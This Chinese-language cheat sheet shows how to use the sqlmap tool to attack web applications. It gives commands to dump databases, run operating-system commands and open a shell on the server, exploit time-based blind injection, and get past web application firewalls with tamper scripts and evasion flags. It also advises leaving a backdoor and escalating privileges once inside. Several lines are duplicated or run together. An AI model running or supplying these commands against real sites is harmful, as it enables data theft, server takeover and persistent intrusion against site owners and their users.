SQLMap注入常用

1.SQLMap注入指定数据库、操作系统 使用获取数据库信息,主要使用的命令包括如下几条:

(1)指定网页的数据库、操作系统  --dbms mysql5.0 --current-db

(2)获取当前库名 --current-db

(3)获取该库中的表名-D “数据库名”--tables

(4)获取该库中的列名-D “列名”-T “表名” --columns

(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

2.SQLMap之交互式写shell及命令执行 

运行任意操作系统命令 :


执行系统命令(windows系统): --os-cmd 

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。

执行shell: --os-shell

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --os-shell


使用获取数据库信息,主要使用的命令包括如下几条:

(1)进行交互式写shell及命令执行 -p id  ==> --os-shell

(2)获取当前库名 --current-db

(3)获取该库中的表名-D “数据库名”--tables

(4)获取该库中的列名-D “列名”-T “表名” --columns

(5)获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfigpython sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入,你可以输入任意命令以执行。对应的选项是 --os-shell,并且和 --sql-shell 一样,具备 TAB 补全和记录历史命令的功能。

进入shell界面 查看是否有管理员权限并留后门提权

3.伪静态一般URL地址格式:

1. http://test.com/php100/id/1/1

2. http://test.com/php100/id/1.html

非伪静态一般URL地址格式:

http://test.com/php100/test.php?id=1

1.python sqlmap.py -u http://www.any.com/lwcms/35*.html --current-db 在sqlmap中伪静态哪儿存在注入点就加*。使用--current-db参数是用于指定当前命令的输出结果是该网站使用的数据库名称。

4.SQLMap之请求延时注入

所谓延时注入主要针对页面无变化,无法用布尔真假判断,无法报错的情况下注入。延时注入是通过页面返回的时间来判断的,不同的mysql数据库版本,延迟注入语句也不同。

mysql >=5.0的可以使用sleep()进行查询;

mysql<5.0的可以使用benchmark()进行查询。

请求延时注入的核心思想:

 if(payload,sleep(3),1)

即payload正确时,程序暂停3秒。否则立刻执行。

 if(payload,1,sleep(3))

即payload正确时,程序立刻执行,否则暂停3秒。

备注:这里payload是指构造的参数数据。

--technique是用于指定sqlmap注入方式的参数,主要有以下几类:

B: Boolean-based blind SQL injection(布尔型盲注)

E: Error-based SQL injection(报错型注入)

Q:Inline queries injection(内联查询)

U: UNION query SQL injection(联合查询注入)

S: Stacked queries SQL injection(可多语句查询注入/栈查询)

T: Time-based blind SQL injection(基于时间的盲注)

猜数据库

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --technique T --time-sec 9 --current-db

(--time-sec参数设定延时时间,默认是5秒)

5. SQLMap之绕过WAF防火墙

1.绕过WAF防火墙的脚本  

sqlmap -u {目标URL} --dbs --batch --flush-session  --tamper=space2hash.py,modsecurityversioned.py

脚本总类:

apostrophemask.py#用utf8代替引号

equaltolike.py#MSSQL * SQLite中like 代替等号

greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号

space2hash.py#空格替换为#号 随机字符串 以及换行符

apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号

halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;

ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

base64encode.py#用base64编码

space2mssqlhash.py#mssql查询中替换空格

modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;

常用脚本:space2morehash.py space2hash.py base64encode.py charencode.py

2. 脚本参数组合策略绕过

以mysql绕过为例,

sqlmap -u {目标URL} --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

sqlmap -u {目标URL} --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

--hpp含义是使用 HTTP 参数污染。HTTP 参数污染(HPP)是一种绕过 WAF/IPS/IDS 保护机制(这里有相关介绍)的方法,针对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种保护机制,可以尝试使用此开关以绕过它。

--random-agent 使用随机选定的HTTP User - Agent头

-v #详细的等级(0-6)

0:只显示Python的回溯,错误和关键消息。

1:显示信息和警告消息。

2:显示调试消息。

3:有效载荷注入。

4:显示HTTP请求。

5:显示HTTP响应头。

6:显示HTTP响应页面的内容

--delay 延迟的时间


备注:这些组合策略可以根据注入的反馈信息,及时调整组合策略

--batch:要求不对目标写入

--tamper:使用干预脚本

注意:若不使用3等级无法继续下一步操作。因为WAF可能采用白名单规则,所以对于选择哪种策略,重点是根据-v 3 提示的信息进行判断,可以抓取主流的浏览器的user-agents适当的延时,加上注入字符转换---大小写、空格、字符串、注释、加密等等方式。

你可能感兴趣的:(SQLMap注入常用)